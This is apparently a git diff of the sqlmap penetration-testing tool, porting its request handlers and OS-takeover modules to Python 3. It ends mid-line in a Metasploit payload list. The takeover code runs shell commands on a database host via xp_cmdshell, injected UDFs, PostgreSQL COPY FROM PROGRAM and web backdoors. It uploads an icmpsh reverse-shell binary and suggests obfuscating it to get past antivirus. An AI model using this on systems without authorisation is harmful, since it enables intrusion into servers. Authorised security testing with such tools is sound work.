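# --- standalone equivalent (class name and URL below are hypothetical):
from urllib import request as _request

class VerbRequest(_request.Request):
    def __init__(self, url, verb, **kwargs):
        _request.Request.__init__(self, url, **kwargs)
        self._verb = verb.upper()

    def get_method(self):
        # urllib calls this to decide which verb goes on the request line
        return self._verb

# _request.urlopen(VerbRequest("http://example.com/resource", "HEAD"))
# --- end of sketch ---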
def get_method(self): - return getattr(self, 'method', urllib2.Request.get_method(self)) + return getattr(self, 'method', _urllib.request.Request.get_method(self)) diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py new file mode 100644 index 00000000000..5b1c3495e4b --- /dev/null +++ b/lib/request/pkihandler.py @@ -0,0 +1,51 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +ssl = None +try: + import ssl as _ssl + ssl = _ssl +except ImportError: + pass + +from lib.core.data import conf +from lib.core.common import getSafeExString +from lib.core.exception import SqlmapConnectionException +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib + + +class HTTPSPKIAuthHandler(_urllib.request.HTTPSHandler): + def __init__(self, auth_file): + _urllib.request.HTTPSHandler.__init__(self) + self.auth_file = auth_file + + def https_open(self, req): + return self.do_open(self.getConnection, req) + + def getConnection(self, host, timeout=None): + if timeout is None: + timeout = conf.timeout + + if not hasattr(_http_client, "HTTPSConnection"): + raise SqlmapConnectionException("HTTPS support is not available in this Python build") + + try: + if ssl and hasattr(ssl, "SSLContext") and hasattr(ssl, "create_default_context"): + ctx = ssl.create_default_context() + ctx.load_cert_chain(certfile=self.auth_file, keyfile=self.auth_file) + try: + return _http_client.HTTPSConnection(host, timeout=timeout, context=ctx) + except TypeError: + pass + + return _http_client.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=timeout) + + except (IOError, OSError) as ex: + errMsg = "error occurred while using key " + errMsg += "file '%s' ('%s')" % (self.auth_file, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py index 683de39d654..1d19cfdd154 100644 --- a/lib/request/rangehandler.py +++ b/lib/request/rangehandler.py @@ -1,50 +1,29 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import urllib -import urllib2 - from lib.core.exception import SqlmapConnectionException +from thirdparty.six.moves import urllib as _urllib -class HTTPRangeHandler(urllib2.BaseHandler): +class HTTPRangeHandler(_urllib.request.BaseHandler): """ Handler that enables HTTP Range headers. Reference: http://stackoverflow.com/questions/1971240/python-seek-on-remote-file - - This was extremely simple. The Range header is a HTTP feature to - begin with so all this class does is tell urllib2 that the - "206 Partial Content" response from the HTTP server is what we - expected. 
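# --- Illustrative sketch, not part of the patch: the urllib2 example removed from
# --- the docstring above showed the point of HTTPRangeHandler - once installed,
# --- a "206 Partial Content" reply to a Range request is accepted as a normal
# --- response instead of an error. A rough modern equivalent (handler name and
# --- URL are hypothetical):
from urllib import request, response

class Partial206Handler(request.BaseHandler):
    def http_error_206(self, req, fp, code, msg, hdrs):
        # Wrap the partial body so callers can read it like any other response
        result = response.addinfourl(fp, hdrs, req.get_full_url(), code=code)
        result.msg = msg
        return result

opener = request.build_opener(Partial206Handler())
ranged = request.Request("http://example.com/", headers={"Range": "bytes=0-99"})
# opener.open(ranged).read() would now return at most the first 100 bytes
# --- end of sketch ---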
- - Example: - import urllib2 - import byterange - - range_handler = range.HTTPRangeHandler() - opener = urllib2.build_opener(range_handler) - - # install it - urllib2.install_opener(opener) - - # create Request and set Range header - req = urllib2.Request('http://www.python.org/') - req.header['Range'] = 'bytes=30-50' - f = urllib2.urlopen(req) """ def http_error_206(self, req, fp, code, msg, hdrs): # 206 Partial Content Response - r = urllib.addinfourl(fp, hdrs, req.get_full_url()) + r = _urllib.response.addinfourl(fp, hdrs, req.get_full_url()) r.code = code r.msg = msg return r def http_error_416(self, req, fp, code, msg, hdrs): # HTTP's Range Not Satisfiable error - errMsg = "Invalid range" + errMsg = "there was a problem while connecting " + errMsg += "target ('416 - Range Not Satisfiable')" raise SqlmapConnectionException(errMsg) diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index c8ff422e3c8..a51b6dd809b 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -1,131 +1,206 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import urllib2 -import urlparse +import io +import re +import time +import types -from lib.core.data import kb -from lib.core.data import logger from lib.core.common import getHostHeader -from lib.core.common import getUnicode +from lib.core.common import getSafeExString from lib.core.common import logHTTPTraffic from lib.core.common import readInput +from lib.core.convert import getBytes +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import HTTPHEADER +from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import REDIRECTION from lib.core.exception import SqlmapConnectionException -from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE +from lib.core.settings import DEFAULT_COOKIE_DELIMITER +from lib.core.settings import MAX_CONNECTION_READ_SIZE from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS from lib.core.settings import MAX_TOTAL_REDIRECTIONS from lib.core.threads import getCurrentThreadData from lib.request.basic import decodePage +from lib.request.basic import parseResponse +from thirdparty import six +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib -class SmartRedirectHandler(urllib2.HTTPRedirectHandler): +class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler): def _get_header_redirect(self, headers): retVal = None if headers: - if "location" in headers: - retVal = headers.getheaders("location")[0].split("?")[0] - elif "uri" in headers: - retVal = headers.getheaders("uri")[0].split("?")[0] + if HTTP_HEADER.LOCATION in headers: + retVal = headers[HTTP_HEADER.LOCATION] + elif HTTP_HEADER.URI in headers: + retVal = headers[HTTP_HEADER.URI] return retVal def _ask_redirect_choice(self, redcode, redurl, method): with kb.locks.redirect: - if kb.redirectChoice is None: - msg = "sqlmap got a %d redirect to " % redcode + if kb.choices.redirect is None: + msg = "got a %d redirect to " % redcode msg += "'%s'. Do you want to follow? 
[Y/n] " % redurl - choice = readInput(msg, default="Y") - kb.redirectChoice = choice.upper() + kb.choices.redirect = REDIRECTION.YES if readInput(msg, default='Y', boolean=True) else REDIRECTION.NO - if kb.redirectChoice == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None: + if kb.choices.redirect == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None: msg = "redirect is a result of a " msg += "POST request. Do you want to " msg += "resend original POST data to a new " msg += "location? [%s] " % ("Y/n" if not kb.originalPage else "y/N") - choice = readInput(msg, default=("Y" if not kb.originalPage else "N")) - kb.resendPostOnRedirect = choice.upper() == 'Y' + kb.resendPostOnRedirect = readInput(msg, default=('Y' if not kb.originalPage else 'N'), boolean=True) - if kb.resendPostOnRedirect: - self.redirect_request = self._redirect_request + if kb.resendPostOnRedirect: + self.redirect_request = self._redirect_request def _redirect_request(self, req, fp, code, msg, headers, newurl): - newurl = newurl.replace(' ', '%20') - return urllib2.Request(newurl, data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host()) + retVal = _urllib.request.Request(newurl.replace(' ', '%20'), data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host() if hasattr(req, "get_origin_req_host") else req.origin_req_host) + + if hasattr(req, "redirect_dict"): + retVal.redirect_dict = req.redirect_dict + + return retVal def http_error_302(self, req, fp, code, msg, headers): + start = time.time() content = None - redurl = self._get_header_redirect(headers) + forceRedirect = False + redurl = self._get_header_redirect(headers) if not conf.ignoreRedirects else None try: - content = fp.read(MAX_CONNECTION_TOTAL_SIZE) - except Exception, msg: - dbgMsg = "there was a problem while retrieving " - dbgMsg += "redirect response content (%s)" % msg - logger.debug(dbgMsg) - finally: - if content: - try: # try to write it back to the read buffer so we could reuse it in further steps - fp.fp._rbuf.truncate(0) - fp.fp._rbuf.write(content) - except: - pass - - content = decodePage(content, headers.get(HTTPHEADER.CONTENT_ENCODING), headers.get(HTTPHEADER.CONTENT_TYPE)) + content = fp.fp.read(MAX_CONNECTION_TOTAL_SIZE) + fp.fp = io.BytesIO(content) + except _http_client.IncompleteRead as ex: + content = ex.partial + fp.fp = io.BytesIO(content) + except: + content = b"" + + content = decodePage(content, headers.get(HTTP_HEADER.CONTENT_ENCODING), headers.get(HTTP_HEADER.CONTENT_TYPE)) threadData = getCurrentThreadData() threadData.lastRedirectMsg = (threadData.lastRequestUID, content) redirectMsg = "HTTP redirect " - redirectMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, getUnicode(msg)) + redirectMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, getUnicode(msg)) if headers: - logHeaders = "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in headers.items()) + logHeaders = "\r\n".join("%s: %s" % (getUnicode(key.capitalize() if hasattr(key, "capitalize") else key), getUnicode(value)) for (key, value) in headers.items()) else: logHeaders = "" redirectMsg += logHeaders if content: - redirectMsg += "\n\n%s" % content[:MAX_CONNECTION_CHUNK_SIZE] + redirectMsg += "\r\n\r\n%s" % getUnicode(content[:MAX_CONNECTION_READ_SIZE]) - logHTTPTraffic(threadData.lastRequestMsg, redirectMsg) + logHTTPTraffic(threadData.lastRequestMsg, redirectMsg, start, time.time()) 
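In http_error_302 above, the redirect body is read once and the response's internal buffer is replaced with an io.BytesIO, so the same bytes can still be read again further down the pipeline; on http.client.IncompleteRead the partial data is kept instead. A condensed sketch of that buffering trick (illustrative only; it relies on the same internal .fp attribute the handler patches):

import io

def snapshot_response_body(resp, limit=1024 * 1024):
    # Read up to 'limit' bytes from the underlying buffer, then swap in a
    # rewindable BytesIO so later resp.read() calls still see the same data
    try:
        content = resp.fp.read(limit)
    except Exception:
        content = b""
    resp.fp = io.BytesIO(content)
    return content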
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg) if redurl: - if not urlparse.urlsplit(redurl).netloc: - redurl = urlparse.urljoin(req.get_full_url(), redurl) - - self._infinite_loop_check(req) - self._ask_redirect_choice(code, redurl, req.get_method()) - - if redurl and kb.redirectChoice == REDIRECTION.YES: - req.headers[HTTPHEADER.HOST] = getHostHeader(redurl) - result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) + try: + if not _urllib.parse.urlsplit(redurl).netloc: + redurl = _urllib.parse.urljoin(req.get_full_url(), redurl) + + self._infinite_loop_check(req) + if conf.scope: + if not re.search(conf.scope, redurl, re.I): + redurl = None + else: + forceRedirect = True + else: + self._ask_redirect_choice(code, redurl, req.get_method()) + except ValueError: + redurl = None + result = fp + + if redurl and (kb.choices.redirect == REDIRECTION.YES or forceRedirect): + parseResponse(content, headers) + + req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) + if headers and HTTP_HEADER.SET_COOKIE in headers: + cookies = dict() + delimiter = conf.cookieDel or DEFAULT_COOKIE_DELIMITER + last = None + + for part in getUnicode(req.headers.get(HTTP_HEADER.COOKIE, "")).split(delimiter) + ([headers[HTTP_HEADER.SET_COOKIE]] if HTTP_HEADER.SET_COOKIE in headers else []): + if '=' in part: + part = part.strip() + key, value = part.split('=', 1) + cookies[key] = value + last = key + elif last: + cookies[last] += "%s%s" % (delimiter, part) + + req.headers[HTTP_HEADER.COOKIE] = delimiter.join("%s=%s" % (key, cookies[key]) for key in cookies) + + try: + result = _urllib.request.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) + except _urllib.error.HTTPError as ex: + result = ex + + # Dirty hack for https://github.com/sqlmapproject/sqlmap/issues/4046 + try: + hasattr(result, "read") + except KeyError: + class _(object): + pass + result = _() + + # Dirty hack for http://bugs.python.org/issue15701 + try: + result.info() + except AttributeError: + def _(self): + return getattr(self, "hdrs", {}) + + result.info = types.MethodType(_, result) + + if not hasattr(result, "read"): + def _(self, length=None): + try: + retVal = getSafeExString(ex) # Note: pyflakes mistakenly marks 'ex' as undefined (NOTE: tested in both Python2 and Python3) + except: + retVal = "" + return getBytes(retVal) + + result.read = types.MethodType(_, result) + + if not getattr(result, "url", None): + result.url = redurl + + if not getattr(result, "code", None): + result.code = 999 + except: + redurl = None + result = fp + fp.read = io.BytesIO(b"").read else: result = fp - if HTTPHEADER.SET_COOKIE in headers: - kb.redirectSetCookie = headers.get(HTTPHEADER.SET_COOKIE).split("; path")[0] + threadData.lastRedirectURL = (threadData.lastRequestUID, redurl) result.redcode = code - result.redurl = redurl - + result.redurl = getUnicode(redurl) if six.PY3 else redurl return result - http_error_301 = http_error_303 = http_error_307 = http_error_302 + http_error_301 = http_error_303 = http_error_307 = http_error_308 = http_error_302 def _infinite_loop_check(self, req): if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS): errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys()) - errMsg += "please check all provided parameters and/or provide missing ones." 
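When a redirect is followed above, the request's existing Cookie header is merged with any Set-Cookie value from the 30x response, letting the newer value win per cookie name. A simplified sketch of that merge (illustrative: it drops the continuation handling the real code does for delimiter characters inside cookie values):

def merge_cookies(request_cookie, set_cookie, delimiter="; "):
    cookies = {}
    parts = (request_cookie or "").split(delimiter)
    if set_cookie:
        parts.append(set_cookie)
    for part in parts:
        part = part.strip()
        if "=" in part:
            key, value = part.split("=", 1)
            cookies[key] = value
    return delimiter.join("%s=%s" % (key, value) for key, value in cookies.items())

assert merge_cookies("a=1; b=2", "b=3") == "a=1; b=3"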
+ errMsg += "Please check all provided parameters and/or provide missing ones" raise SqlmapConnectionException(errMsg) diff --git a/lib/request/templates.py b/lib/request/templates.py index f073c1dda88..42ebe074e20 100644 --- a/lib/request/templates.py +++ b/lib/request/templates.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.data import kb @@ -13,10 +13,9 @@ def getPageTemplate(payload, place): if payload and place: if (payload, place) not in kb.pageTemplates: - page, _ = Request.queryPage(payload, place, content=True) + page, _, _ = Request.queryPage(payload, place, content=True, raise404=False) kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None) retVal = kb.pageTemplates[(payload, place)] return retVal - diff --git a/lib/takeover/__init__.py b/lib/takeover/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/takeover/__init__.py +++ b/lib/takeover/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py index 51fab985413..cb3e8a58bcb 100644 --- a/lib/takeover/abstraction.py +++ b/lib/takeover/abstraction.py @@ -1,33 +1,40 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -from extra.safe2bin.safe2bin import safechardecode -from lib.core.common import dataToStdout +from __future__ import print_function + +import sys + from lib.core.common import Backend +from lib.core.common import dataToStdout from lib.core.common import getSQLSnippet -from lib.core.common import isTechniqueAvailable +from lib.core.common import isStackingAvailable from lib.core.common import readInput +from lib.core.convert import getUnicode from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger +from lib.core.enums import AUTOCOMPLETE_TYPE from lib.core.enums import DBMS -from lib.core.enums import PAYLOAD +from lib.core.enums import OS from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.shell import autoCompletion from lib.request import inject from lib.takeover.udf import UDF from lib.takeover.web import Web -from lib.takeover.xp_cmdshell import Xp_cmdshell - +from lib.takeover.xp_cmdshell import XP_cmdshell +from lib.utils.safe2bin import safechardecode +from thirdparty.six.moves import input as _input -class Abstraction(Web, UDF, Xp_cmdshell): +class Abstraction(Web, UDF, XP_cmdshell): """ This class defines an abstraction layer for OS takeover functionalities - to UDF / Xp_cmdshell objects + to UDF / XP_cmdshell objects """ def __init__(self): @@ -36,10 +43,13 @@ def __init__(self): UDF.__init__(self) Web.__init__(self) - Xp_cmdshell.__init__(self) + XP_cmdshell.__init__(self) def execCmd(self, cmd, silent=False): - if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): + if Backend.isDbms(DBMS.PGSQL) 
and self.checkCopyExec(): + self.copyExecCmd(cmd) + + elif self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail): self.webBackdoorRunCmd(cmd) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): @@ -55,7 +65,10 @@ def execCmd(self, cmd, silent=False): def evalCmd(self, cmd, first=None, last=None): retVal = None - if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): + if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): + retVal = self.copyExecCmd(cmd) + + elif self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail): retVal = self.webBackdoorRunCmd(cmd) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): @@ -71,17 +84,17 @@ def evalCmd(self, cmd, first=None, last=None): return safechardecode(retVal) def runCmd(self, cmd): - getOutput = None + choice = None if not self.alwaysRetrieveCmdOutput: message = "do you want to retrieve the command standard " message += "output? [Y/n/a] " - getOutput = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if getOutput in ("a", "A"): + if choice == 'A': self.alwaysRetrieveCmdOutput = True - if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveCmdOutput: + if choice == 'Y' or self.alwaysRetrieveCmdOutput: output = self.evalCmd(cmd) if output: @@ -92,20 +105,25 @@ def runCmd(self, cmd): self.execCmd(cmd) def shell(self): - if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): + if self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail): infoMsg = "calling OS shell. To quit type " infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) else: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - infoMsg = "going to use injected sys_eval and sys_exec " - infoMsg += "user-defined functions for operating system " + if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): + infoMsg = "going to use 'COPY ... FROM PROGRAM ...' " + infoMsg += "command execution" + logger.info(infoMsg) + + elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + infoMsg = "going to use injected user-defined functions " + infoMsg += "'sys_eval' and 'sys_exec' for operating system " infoMsg += "command execution" logger.info(infoMsg) elif Backend.isDbms(DBMS.MSSQL): - infoMsg = "going to use xp_cmdshell extended procedure for " + infoMsg = "going to use extended procedure 'xp_cmdshell' for " infoMsg += "operating system command execution" logger.info(infoMsg) @@ -117,19 +135,22 @@ def shell(self): infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) - autoCompletion(osShell=True) + autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX) while True: command = None try: - command = raw_input("os-shell> ") + command = _input("os-shell> ") + command = getUnicode(command, encoding=sys.stdin.encoding) + except UnicodeDecodeError: + pass except KeyboardInterrupt: - print + print() errMsg = "user aborted" logger.error(errMsg) except EOFError: - print + print() errMsg = "exit" logger.error(errMsg) break @@ -146,8 +167,8 @@ def _initRunAs(self): if not conf.dbmsCred: return - if not conf.direct and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - errMsg = "stacked queries is not supported hence sqlmap cannot " + if not conf.direct and not isStackingAvailable(): + errMsg = "stacked queries are not supported hence sqlmap cannot " errMsg += "execute statements as another user. 
The execution " errMsg += "will continue and the DBMS credentials provided " errMsg += "will simply be ignored" @@ -159,23 +180,22 @@ def _initRunAs(self): msg = "on Microsoft SQL Server 2005 and 2008, OPENROWSET function " msg += "is disabled by default. This function is needed to execute " msg += "statements as another DBMS user since you provided the " - msg += "--dbms-creds switch. If you are DBA, you can enable it. " + msg += "option '--dbms-creds'. If you are DBA, you can enable it. " msg += "Do you want to enable it? [Y/n] " - choice = readInput(msg, default="Y") - if not choice or choice in ("y", "Y"): + if readInput(msg, default='Y', boolean=True): expression = getSQLSnippet(DBMS.MSSQL, "configure_openrowset", ENABLE="1") inject.goStacked(expression) # TODO: add support for PostgreSQL - #elif Backend.isDbms(DBMS.PGSQL): - # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") - # inject.goStacked(expression) + # elif Backend.isDbms(DBMS.PGSQL): + # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") + # inject.goStacked(expression) - def initEnv(self, mandatory=True, detailed=False, web=False): + def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False): self._initRunAs() - if self.envInitialized: + if self.envInitialized and not forceInit: return if web: @@ -185,7 +205,7 @@ def initEnv(self, mandatory=True, detailed=False, web=False): if mandatory and not self.isDba(): warnMsg = "functionality requested probably does not work because " - warnMsg += "the curent session user is not a database administrator" + warnMsg += "the current session user is not a database administrator" if not conf.dbmsCred and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): warnMsg += ". You can try to use option '--dbms-cred' " @@ -193,9 +213,11 @@ def initEnv(self, mandatory=True, detailed=False, web=False): warnMsg += "were able to extract and crack a DBA " warnMsg += "password by any mean" - logger.warn(warnMsg) + logger.warning(warnMsg) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): + success = True + elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): success = self.udfInjectSys() if success is not True: diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py index 53fb73892d0..044394fc04a 100644 --- a/lib/takeover/icmpsh.py +++ b/lib/takeover/icmpsh.py @@ -1,11 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os +import re +import socket import time from extra.icmpsh.icmpsh_m import main as icmpshmaster @@ -18,9 +20,9 @@ from lib.core.data import conf from lib.core.data import logger from lib.core.data import paths +from lib.core.exception import SqlmapDataException - -class ICMPsh: +class ICMPsh(object): """ This class defines methods to call icmpsh for plugins. """ @@ -29,22 +31,54 @@ def _initVars(self): self.lhostStr = None self.rhostStr = None self.localIP = getLocalIP() - self.remoteIP = getRemoteIP() + self.remoteIP = getRemoteIP() or conf.hostname self._icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe_")) def _selectRhost(self): - message = "what is the back-end DBMS address? 
[%s] " % self.remoteIP - address = readInput(message, default=self.remoteIP) + address = None + message = "what is the back-end DBMS address? " + + if self.remoteIP: + message += "[Enter for '%s' (detected)] " % self.remoteIP + + while not address: + address = readInput(message, default=self.remoteIP) + + if conf.batch and not address: + raise SqlmapDataException("remote host address is missing") return address def _selectLhost(self): - message = "what is the local address? [%s] " % self.localIP - address = readInput(message, default=self.localIP) + address = None + message = "what is the local address? " + + if self.localIP: + message += "[Enter for '%s' (detected)] " % self.localIP + + valid = None + while not valid: + valid = True + address = readInput(message, default=self.localIP or "") + + try: + socket.inet_aton(address) + except socket.error: + valid = False + finally: + valid = valid and re.search(r"\d+\.\d+\.\d+\.\d+", address) is not None + + if conf.batch and not address: + raise SqlmapDataException("local host address is missing") + elif address and not valid: + warnMsg = "invalid local host address" + logger.warning(warnMsg) return address def _prepareIngredients(self, encode=True): + self.localIP = getattr(self, "localIP", None) + self.remoteIP = getattr(self, "remoteIP", None) self.lhostStr = ICMPsh._selectLhost(self) self.rhostStr = ICMPsh._selectRhost(self) @@ -67,19 +101,30 @@ def uploadIcmpshSlave(self, web=False): self._randStr = randomStr(lowercase=True) self._icmpslaveRemoteBase = "tmpi%s.exe" % self._randStr - if web: - self._icmpslaveRemote = "%s/%s" % (self.webDirectory, self._icmpslaveRemoteBase) - else: - self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase) - + self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase) self._icmpslaveRemote = ntToPosixSlashes(normalizePath(self._icmpslaveRemote)) logger.info("uploading icmpsh slave to '%s'" % self._icmpslaveRemote) if web: - self.webUpload(self._icmpslaveRemote, self.webDirectory, filepath=self._icmpslave) + written = self.webUpload(self._icmpslaveRemote, os.path.split(self._icmpslaveRemote)[0], filepath=self._icmpslave) + else: + written = self.writeFile(self._icmpslave, self._icmpslaveRemote, "binary", forceCheck=True) + + if written is not True: + errMsg = "there has been a problem uploading icmpsh, it " + errMsg += "looks like the binary file has not been written " + errMsg += "on the database underlying file system or an AV has " + errMsg += "flagged it as malicious and removed it. 
In such a case " + errMsg += "it is recommended to recompile icmpsh with slight " + errMsg += "modification to the source code or pack it with an " + errMsg += "obfuscator software" + logger.error(errMsg) + + return False else: - self.writeFile(self._icmpslave, self._icmpslaveRemote, "binary") + logger.info("icmpsh successfully uploaded") + return True def icmpPwn(self): ICMPsh._prepareIngredients(self) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 38fdcc8a7a1..d29dfae9af6 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -1,49 +1,60 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + +import errno import os import re +import select import sys +import tempfile import time from subprocess import PIPE +from extra.cloak.cloak import cloak +from extra.cloak.cloak import decloak from lib.core.common import dataToStdout from lib.core.common import Backend from lib.core.common import getLocalIP from lib.core.common import getRemoteIP -from lib.core.common import getUnicode +from lib.core.common import isDigit from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import pollProcess from lib.core.common import randomRange from lib.core.common import randomStr from lib.core.common import readInput +from lib.core.convert import getBytes +from lib.core.convert import getText from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import DBMS from lib.core.enums import OS from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapFilePathException +from lib.core.exception import SqlmapGenericException from lib.core.settings import IS_WIN -from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import METASPLOIT_SESSION_TIMEOUT +from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER from lib.core.subprocessng import blockingReadFromFD from lib.core.subprocessng import blockingWriteToFD from lib.core.subprocessng import Popen as execute from lib.core.subprocessng import send_all from lib.core.subprocessng import recv_some +from thirdparty import six if IS_WIN: import msvcrt -else: - from select import select -class Metasploit: +class Metasploit(object): """ This class defines methods to call Metasploit for plugins. 
""" @@ -57,72 +68,68 @@ def _initVars(self): self.encoderStr = None self.payloadConnStr = None self.localIP = getLocalIP() - self.remoteIP = getRemoteIP() - self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli")) - self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode")) - self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload")) - - if IS_WIN: - _ = normalizePath(os.path.join(conf.msfPath, "..", "scripts", "setenv.bat")) - self._msfCli = "%s & ruby %s" % (_, self._msfCli) - self._msfEncode = "ruby %s" % self._msfEncode - self._msfPayload = "%s & ruby %s" % (_, self._msfPayload) + self.remoteIP = getRemoteIP() or conf.hostname + self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli%s" % (".bat" if IS_WIN else ""))) + self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole%s" % (".bat" if IS_WIN else ""))) + self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode%s" % (".bat" if IS_WIN else ""))) + self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload%s" % (".bat" if IS_WIN else ""))) + self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom%s" % (".bat" if IS_WIN else ""))) self._msfPayloadsList = { - "windows": { - 1: ("Meterpreter (default)", "windows/meterpreter"), - 2: ("Shell", "windows/shell"), - 3: ("VNC", "windows/vncinject"), - }, - "linux": { - 1: ("Shell (default)", "linux/x86/shell"), - 2: ("Meterpreter (beta)", "linux/x86/meterpreter"), - } - } + "windows": { + 1: ("Meterpreter (default)", "windows/meterpreter"), + 2: ("Shell", "windows/shell"), + 3: ("VNC", "windows/vncinject"), + }, + "linux": { + 1: ("Shell 